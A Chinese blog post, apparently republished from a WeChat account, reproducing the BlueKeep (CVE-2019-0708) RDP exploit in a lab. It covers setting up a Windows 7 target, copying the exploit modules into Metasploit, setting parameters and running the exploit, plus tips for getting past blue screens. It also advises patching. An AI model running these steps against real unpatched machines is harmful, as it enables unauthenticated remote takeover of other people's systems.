CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

  • A+
所属分类:安全闲碎

工程师江湖的某个小哥,最近比较寂寞,所以....

本文关键内容:CVE0708漏洞

出自公众号:工程师江湖


一、背景


2019年9月7日凌晨1时左右,有个老哥在Github上发布了CVE2019-0708的漏洞利用工具(这个漏洞早在2019年5月14日就已经被微软披露过)一时间刷爆了朋友圈和各种群,连交通指示牌也没能幸免。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

无奈电脑系统崩溃重新做了系统,虚拟机都得重新下载,网速还慢,相关准备工作今天才做好。


好了,废话不多说,下面开始今天的正题。


此次高危漏洞受影响的版本有:

Windows 7 for 32-bit SP1

Windows 7 for x64-based SP1

Windows Server 2008 for 32-bit SP2

Windows Server 2008 for 32-bit SP2 (Server Core installation)

Windows Server 2008 for Itanium-Based SP2

Windows Server 2008 for x64-based SP2

Windows Server 2008 for x64-based SP2 (Server Core installation)

Windows Server 2008 R2 for Itanium-BasedSystems SP1

Windows Server 2008 R2 for x64-based SP1

Windows Server 2008 R2 for x64-based SP1 (Server Core installation)

Windows XP SP3 x86

Windows XP SP2 x64

Windows XP Embedded SP3 x86

Windows Server 2003 SP2 x86

Windows Server 2003 SP2 x64


明显可以看到,漏洞只影响WindowsXP、Windows7等旧版本操作系统,而且本次发布的攻击模块也暂时只包含Windows7SP1 64位操作系统和WindowsServer2008R2 64位操作系统。朋友们,你们没必要惊慌失措,只要正常安装补丁就可以不受该漏洞影响。


况且现在很多人都使用了windows10系统,完全OJBK。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

确定版本命令:winver

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


二、干货——靶机部署


危害描述

漏洞(CVE2019-0708)通过操作系统的远程桌面服务使得攻击者无需账号和密码即可入侵操作系统,执行任意病毒代码,并且可以横向传播,感染其它电脑,属于高危级别漏洞,危害堪比永恒之蓝。


漏洞复现

下面我们用虚拟机复现利用一下该漏洞:首先安装Vmware虚拟机程序,这里不再复述。安装好软件之后我们来开始部署靶机,这里使用Windows7 SP1版本,下载地址为:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

可以自行用下载工具进行下载。


下载完毕之后进行安装,安装好如下:

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

漏洞利用的是远程桌面来进行入侵攻击的,所以远程桌面当然要打开。


CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

以上,靶机部署完成。


三、干货——攻击机的部署


安装组件

攻击机理论上是可以使用所有Linux系统,并安装metasploit-framework工具(下文简称为msf),具体命令为:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall


在这里我使用的是Kali Linux里面的metasploit-framework

安装好之后,首先我们要先去下载好攻击套件放到msf相应的文件夹(如果已存在同名文件,覆盖即可)

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

然后将上图四个文件复制到相应的位置

rdp.rb ->

/opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb


rdp_scanner.rb ->

/opt/Metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb


cve_2019_0708_bluekeep.rb ->

/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb


cve_2019_0708_bluekeep_rce.rb ->

/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

命令为:

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/

下面两个命令如果没有rdp目录,就用mkdir创建一个rdp目录:(cd 相应目录,然后mkdir rdp)


例如:

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我.

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

接着启动msf,命令为msfconsole

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

出现msf5>说明启动成功,下面更新一下msf。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

命令是msfupdate


更新以后使用reload_all重新加载CVE2019-0708模块。


CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


攻击开始

下面来使用模块进行攻击,命令是:

use exploit/rdp/cve_2019_0708_bluekeep_rce

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


利用成功之后会出现下面的这些内容:

exploit(rdp/cve_2019_0708_bluekeep_rce)

如果出现报错,例如无法加载,是攻击模块没复制正确,或者忘记重新加载命令。


下面我们show options 可以看到一些需要设置的参数。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


RHOSTS 靶机IP

LHOST    本机IP

RPORT rdp端口

target ID数字(可选为0-4)设置受害机机器架构

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


设置好之后开始攻击,可以使用exploit或者run。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

已经拿到服务器权限了。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


写一句话,看看是否成功。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


四、总结

以上就是运用CVE2019-0708漏洞的一次入侵过程复现,不要以为这么顺风顺水,这其中还有很多的情况,比如下图的蓝屏等情况。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


如果出现蓝屏的情况,把target重新设置成1,这时必定蓝屏,然后设置为2,此时也必定蓝屏,之后再设置成3,就会有惊喜产生。


为什么会出现蓝屏的情况?

我猜是因为内核不兼容或者返回的内存地址不对造成的,因为这种EXP尚不稳定,实战中没法真正的去用。


其中故障总结

1、

如果出现下图这种错误,把四个文件重新再复制一下到相应位置,然后重新进入msf,重新加载模块即可。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


2、

出现下图这种情况为两台机器不能通信即ping不通,或者远程桌面服务没开启,或者做了防火墙等各种限制。

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我


右下角点 再看评论,送我飞上天,因为我想看太阳肩并肩。

备注:相关问题会在知识星球解答。

最后

有任何问题,欢迎入群交流。

————  e n d ————


觉得文章不错的,欢迎点在看转发,长按下图关注公众号 工程师江湖,收看更多精彩。


CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

今日问题:你有什么想法?


CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

今日推荐阅读

CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

1、等保到底是个什么玩意(一):前序介绍

2、你,真的安全吗?(本地渗透环境)

3、Linux安全配置规范

4、Linux视频资源

5、等保实施文档和视频资源分享

.......

本文始发于微信公众号(工程师江湖):CVE0708漏洞一出,交通指示牌表示很难受,居然有人黑我

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: